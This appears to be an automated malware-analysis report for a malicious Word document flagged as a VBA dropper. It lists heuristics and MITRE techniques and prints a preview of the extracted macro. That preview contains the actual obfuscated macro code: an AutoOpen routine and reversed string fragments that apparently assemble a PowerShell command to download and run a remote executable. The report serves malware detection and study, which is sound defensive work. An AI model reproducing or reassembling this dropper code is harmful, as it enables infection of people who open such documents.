MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The critical heuristic 'OLE_VBA_SHELL' indicates the macro uses the Shell() function, which is commonly used to download and execute additional payloads. The ClamAV detection name 'Doc.Dropper.Agent-6544906-0' further confirms its malicious nature as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6544906-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6544906-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 119608 bytes |
SHA-256: b33e6c5c40bb4c03b9b1b91a332b0b243a87a6353948d0acb7868ff65d0ae4bb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "XdCAsFf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Zwwljw(WVuDs)
dtwcj = OWudZ
IciLH = vVDENc
pwIMP = dtJuji + Sgn(71781 - JNGfVY - YVqLN + Fix(24725)) - 15221 - CDbl(43028)
ZfUNq = 16183
End Sub
Sub Jiwwa(hwjWkl)
wYsDw = bRBBS
XEVAJ = GAHzB
crYns = rcWOIA + Sgn(75112 - QZhoI - jaCuMz + Fix(43435)) - 97420 - CDbl(57959)
AwXWbE = 84991
YWKpzI = VNsGjT
oYqBo = buItwl
JcRpL = tQmRqb + Sgn(88703 - rkdszR - JwfZQN + Fix(24314)) - 57235 - CDbl(26124)
rOums = 93574
uwaCC = zaujj
iAATh = ilQvTj
YAzMzL = nazwqi + Sgn(14146 - jzVhcS - QquNmO + Fix(22200)) - 75244 - CDbl(97435)
tPdGzN = 90468
End Sub
Sub kXEDB(CsmERa)
DTqkIS = ZlbnwT
Odkjla = rviMp
KtbHV = spwnW + Sgn(83810 - IuzvRE - fnOBXf + Fix(1204)) - 46698 - CDbl(23195)
MXTAc = 60650
URabH = qOpqR
szMHH = WfZjqX
dYbwY = jPqaAi + Sgn(12727 - VYnip - FUYzPL + Fix(29502)) - 10319 - CDbl(942)
laDGdu = 28157
End Sub
Sub Autoopen()
On Error Resume Next
QwlEB = MdAMB
mABoP = zcjNi
OGpZaA = aKXSsz + Sgn(1950 - zmlKC - uzlZP + Fix(82776)) - 37820 - CDbl(89362)
jDRKpv = 68791
wYOsRvwrLPZC (DARawO + EdYfjBd + IrOrAp)
CcWUIE = LJbjXr
bmLWP = iJldz
CQYcct = iBpnVn + Sgn(60776 - rrptYW - hECUl + Fix(79165)) - 29161 - CDbl(86242)
tWZBin = 62456
End Sub
Sub maJNlz(jjMqRv)
ZMjjTZ = IITIw
wOiEEL = HwNGvF
lBcYa = JzMSzT + Sgn(13215 - iSpFnF - UFIlGF + Fix(54446)) - 51820 - CDbl(98268)
oOMVHf = 89649
CkBBME = EzdjXA
zUQvT = UqhWNp
EtWXm = YlUqTt + Sgn(7829 - CHzub - jOsELM + Fix(14682)) - 24503 - CDbl(22783)
foWtj = 20341
FuccWf = zCPmSj
blNfpB = LZnLZ
KiWKT = jtAzzJ + Sgn(69046 - HJzUu - UDCJOr + Fix(16817)) - 17496 - CDbl(88733)
oRzMT = 36407
End Sub
Sub ETaCpa(NVFoKC)
SRwwHb = wciXz
KiMXto = sBTZfc
vslUw = sVAAOM + Sgn(82599 - Irsfp - bfJivW + Fix(48510)) - 68274 - CDbl(32839)
XTiLRD = 81801
End Sub
Attribute VB_Name = "YHnphLIjz"
Sub kKbtp(oQjDZb)
IECdv = fAEAdG
HmzzZO = NzGWd
wXBUnp = pikfiN + Sgn(96480 - KfJzm - aCSld + Fix(20598)) - 5186 - CDbl(8343)
wjzRm = 15745
End Sub
Function EdYfjBd()
On Error Resume Next
kNoJsc = SPMQH
TwYqW = UjjJi
lUmwiv = JLvwJ + Sgn(55464 - zAzVR - vBpBHJ + Fix(90229)) - 30996 - CDbl(75661)
ADJPG = 15175
iwskWY = DJjRjA
AffjkW = lEEHr
uAAbX = JIpOGV + Sgn(84480 - PwnAl - ftESw + Fix(25098)) - 85246 - CDbl(69596)
tocfWk = 6879
pGHoPXmr = ChkBM("0ajTYjH+';)CD'+'S'+'3'+'7'+'Pj()'+'zNJ'+'me'+'tI-'+'ezNJ+zNJkzNJ+zNJovnIz'+'NJ'+'('+'&;'+')CDS'+'37P'+'j'+' ,)(b'+'Hdg'+'N'+'Ggkks", 45294 + 3 - 45294, 45294 + 121 - 45294)
IuFrm = QYKsG
mRDWZW = viiKi
Pvadp = fMpiG + Sgn(61996 - tiotlU - wGbkGG + Fix(99928)) - 68845 - CDbl(15743)
ijWSXQ = 80794
PdiQGV = ZfzhEZ
NkRQP = wICpsQ
wSIBz = IWzzZ + Sgn(529 - KQwtCv - doVKi + Fix(29384)) - 19615 - CDbl(60008)
bsYqE = 98996
fQZvw = ChkBM("Lz]RAhC[,'37Pj' ecalPEr-69]RAhC[,)17]RAhC[+301]RAhC[+701]RAhC[+78]RAhC[(ecalPEr- )'}'+'}'+'{'+'hctac};k'+'a'+'erb'djBa", 90678 + 5 - 90678, 90678 + 112 - 90678)
WvimR = QmrPkh
MInwqn = wzTjI
QVEBJa = IZwUJ + Sgn(16398 - XiTSfc - uSFbzQ + Fix(79681)) - 20662 - CDbl(48258)
wdnPui = 80162
lrjSB = uchKp
ROQWED = UqhET
jtmKXI = zYdEPi + Sgn(45482 - tUaDRW - mYMWzr + Fix(49140)) - 39675 - CDbl(9123)
PXRMHR = 19092
wPVWlQX = ChkBM("47+';)3312'+'82 ,'+'00001(tx'+'en.ds'+'adas'+'n37Pj = BS'+'N3'+'7Pj;tn'+'e'+'ilCbeW.te'+'N.m'+'et'+'syS )'+'zRIcY%", 11808 + 6 - 11808, 11808 + 107 - 11808)
JotkL = VfqbW
BBYoH = wBLoX
YRzLG = lDQBI + Sgn(64882 - BMFAR - wwzlO + Fix(98838)) - 55257 - CDbl(9463)
TIqURp = 22713
BJANH = bFCdq
TKzXwP = QjGjww
aLQVF = IuvYib + Sgn(96633 - zKhQU - sGcww + Fix(315)) - 38097 - CDbl(42921)
udEQnw = 31089
JwsJqlBLzlj = ChkBM("QaN't'+'th@/BxuenU/s'+'w.sawa//:'+'p'+'tth '+'zNJ ='+' XC'+'DA37Pj'wwKt", 89407 + 5 - 89407, 89407 + 64 - 89407)
jXuoZO = pVRhS
ZPbsb = jUZFc
PBviKK = hVAtZ + Sgn(30924 - sDHbi - DFUOcY + Fix(23435)) - 59120 - CDbl(62876)
HSSB
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.